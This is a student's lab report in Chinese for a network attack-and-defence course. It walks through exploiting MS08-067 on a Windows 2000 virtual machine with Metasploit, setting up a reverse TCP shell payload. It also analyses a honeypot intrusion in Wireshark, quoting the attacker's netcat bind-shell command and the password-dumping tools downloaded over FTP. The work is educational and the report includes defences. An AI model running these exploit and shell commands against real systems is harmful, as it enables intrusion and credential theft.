20252818 2025-2026-2 《网络攻防实践》第六次作业

1.实践内容

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实践过程

2.1 实验环境

本次实验实际用到的主要虚拟机如下:

主机名称 系统类型 作用 IP地址
Kali Linux Linux 攻击机 192.168.200.129
Win2k Windows 2000 靶机 192.168.200.131

其中,实验一主要使用Kali对Win2k进行漏洞利用;实验二是在Kali中打开日志文件进行取证分析;实验三仍然在同一台电脑上的多台虚拟机环境中完成,由一台虚拟机扮演攻击方,另一台虚拟机扮演被攻击方。

2.2 动手实践:Metasploit Windows远程渗透攻击

2.2.1 实验目标

本实验使用Kali作为攻击机,对Windows靶机Win2k的MS08-067漏洞进行远程渗透测试,尝试获取目标主机的访问权限。

在本实验中,攻击机IP为192.168.200.129,靶机IP为192.168.200.131

Kali的IP
image

Win2k的IP
image

2.2.2 启动Metasploit

首先在Kali中启动Metasploit控制台:

msfconsole

启动Metasploit
image

2.2.3 搜索并加载MS08-067模块

在控制台中先搜索漏洞模块,再加载对应模块:

search ms08_067
use exploit/windows/smb/ms08_067_netapi

search ms08_067截图
image

加载漏洞利用模块
image

2.2.4 查看参数并配置攻击信息

接下来查看模块参数,并根据实验环境设置载荷和目标参数:

show options
set payload generic/shell_reverse_tcp #设置反向TCP Shell载荷
set RHOSTS 192.168.200.131 #设置Windows靶机地址
set LHOST 192.168.200.129 #设置Kali攻击机地址
set TARGET 0 #设置为自动识别
show options

查看模块参数
image

配置攻击参数
image

参数确认
image

2.2.5 发起攻击并验证结果

参数配置完成后,执行攻击:

exploit

如果攻击成功,就会建立会话并获取目标主机的控制权限。

漏洞利用成功
image

建立会话后,可继续执行以下命令验证控制结果:

ipconfig
net user
ver

通过这些命令可以查看目标主机的网络配置、用户信息和系统版本,从而进一步证明会话已经成功建立。

查看目标网络信息
image

查看目标用户信息
image

查看目标系统信息
image

2.3 取证分析实践:解码一次成功的NT系统破解攻击

2.3.1 实验目标

本部分通过Wireshark对给定日志文件进行分析,还原来自213.116.251.162的攻击者成功攻陷蜜罐主机172.16.1.106的整个攻击过程,并回答以下问题:

1.攻击者使用了什么破解工具进行攻击;
2.攻击者如何使用这个破解工具进入并控制系统;
3.攻击者获得系统访问权限后做了什么;
4.我们如何防止这样的攻击;
5.攻击者是否警觉了他的目标是一台蜜罐主机。

2.3.2 打开日志文件并进行初步筛选

首先在Wireshark中打开题目给定的日志文件。

打开日志文件
image

然后先对攻击者与目标主机之间的HTTP通信进行筛选:

ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http

基础流量筛选
image

通过该过滤条件,可以先快速定位攻击者和目标主机之间与Web服务有关的可疑流量,为后续分析漏洞利用过程提供基础。

2.3.3 分析攻击者使用的工具与漏洞利用方式

进一步使用下列过滤条件筛选与msadc相关的请求:

http.request.uri contains "msadc"

与msadc相关的可疑请求
image

继续对关键数据流进行跟踪分析:

tcp.stream eq 11

关键攻击流量
image

从这一部分流量中可以看到,攻击者针对/msadc/msadcs.dll/AdvancedDataFactory.Query发起了恶意请求,并出现了明显的攻击特征字符串。结合这一特征,可以判断攻击者使用的是msadc(2).pl一类的工具,借助MDAC RDS相关漏洞实现远程命令执行。

2.3.4 分析攻击者如何进入并控制系统

在确认漏洞利用后,继续分析攻击者建立控制权的过程。

首先分析攻击者建立Shell的关键流量:

tcp.stream eq 109

关键控制流量
image

从这里可以看到,攻击者通过恶意请求植入了如下命令:

nc -l -p 6969 -e cmd1.exe

这说明攻击者利用netcat在目标主机的6969端口开启监听,并绑定系统命令行程序,从而获得交互式控制能力。

筛选了6969端口流量

tcp.port == 6969

6969端口控制流量
image

2.3.5 分析攻击者获得权限后做了什么

继续跟踪下载工具的流量:

tcp.stream eq 106

下载恶意工具流量
image

根据该部分流量,可以看到攻击者通过FTP下载了多个工具文件,包括:nc.exepdump.exesamdump.dll

这些工具通常用于建立控制、提取口令和辅助后渗透操作。

继续跟踪流量

tcp.stream eq 178

获得权限后的系统操作
image
这张图更像说明攻击者访问了目标Web服务

从后续操作中,可以整理出以下攻击行为:

攻击者在获得权限后进行了文件传输操作
image

传完之后又执行del ftpcom把这个脚本删掉
image

2.3.6 我们如何防止这样的攻击

针对这种攻击方式,可以从以下几个方面进行防护:

1.及时修补系统和相关服务漏洞;
2.关闭不必要的高危服务和组件;
3.使用防火墙限制异常访问和危险端口;
4.部署入侵检测与日志审计机制;
5.对异常命令执行、文件传输和远程控制行为进行重点监控。

2.3.7 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

从后续交互内容来看,攻击者在获得权限后已经对目标环境产生怀疑,并通过留下文本内容等方式明确表达了对目标为蜜罐的判断,因此可以认为攻击者最终已经意识到其攻击对象是一台蜜罐主机。

攻击者识别蜜罐
image

2.4 团队对抗实践:Windows系统远程渗透攻击和分析

2.4.1 对抗环境说明

本次实验中,一台主机作为攻击机,另一台主机作为Windows靶机,同时通过Wireshark对攻击过程中的网络流量进行监听和分析。

  • 攻击机:Kali Linux 192.168.3.129(马凯明)
  • 靶机:Win2k 192.168.3.126(段一凡)
  • 使用漏洞:MS08-067

我方攻击机IP截图
image

2.4.2 攻击过程

在团队对抗实践中,攻击流程与前面的Metasploit实验基本一致:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOSTS 192.168.3.126
set LHOST 192.168.3.129
show options
exploit
ipconfig

image

image

通过以上命令,攻击机对靶机发起漏洞利用,并在攻击成功后查看目标主机的网络、用户和系统信息,以验证已经成功获取控制权。

成功建立会话截图
image

获取控制权,输出地址
image

2.4.3 流量监听与分析

在对抗过程中,使用Wireshark对攻击机与靶机之间的流量进行监听。可以先通过以下过滤条件定位双方通信:

ip.addr == 192.168.3.129 and ip.addr == 192.168.3.126

Wireshark抓包截图
image

3.学习中遇到的问题及解决

  • 问题1:Metasploit 攻击时未能成功建立会话。

  • 问题1解决方案:首先检查RHOSTSLHOST是否填写正确,并确认攻击机与靶机在同一网络中;如果参数无误仍然失败,再检查靶机系统是否满足漏洞环境要求。

  • 问题2:取证分析时,不知道应该从哪里开始筛选数据包。

  • 问题2解决方案:** 先从攻击者IP与目标主机IP的基础过滤开始,再逐步缩小到HTTP、msadctcp.stream和特定端口流量,这样更容易定位关键攻击阶段。

  • 问题3:分析攻击者控制系统的过程时,最开始看不懂 6969 端口流量的作用。

  • 问题3解决方案:通过继续跟踪HTTP流并结合命令内容分析,确认该流量与netcat建立控制端口有关,从而理解了攻击者是如何获得交互式访问权限的。

  • 问题4:团队对抗时,虽然会话建立了,但不确定是否真的拿到了目标控制权。

  • 问题4解决方案:在成功建立会话后执行ipconfig等命令,通过目标主机返回结果来验证攻击是否真正成功。

4.实践总结

通过本次实验,我对Windows系统远程渗透攻击、攻击流量取证分析以及虚拟机环境中的对抗实验有了更加直观的认识。

在Metasploit实验中,我掌握了MS08-067漏洞利用的基本流程,理解了模块搜索、参数设置、漏洞利用和会话验证等关键步骤;在取证分析实验中,我学会了通过Wireshark对日志流量进行筛选、跟踪和还原,并根据数据包内容分析攻击者的工具、攻击方式和后续行为;在团队对抗实验中,我又从攻击实施和流量分析两个角度加深了对Windows远程渗透过程的理解。

总体来说,这次实验让我对“漏洞利用—权限获取—后渗透操作—流量分析还原”这一完整过程有了更系统的认识,也提高了我在网络攻防实验中的实际操作能力和分析能力。

posted @ 2026-04-22 15:48  马凯明  阅读(13)  评论(0)    收藏  举报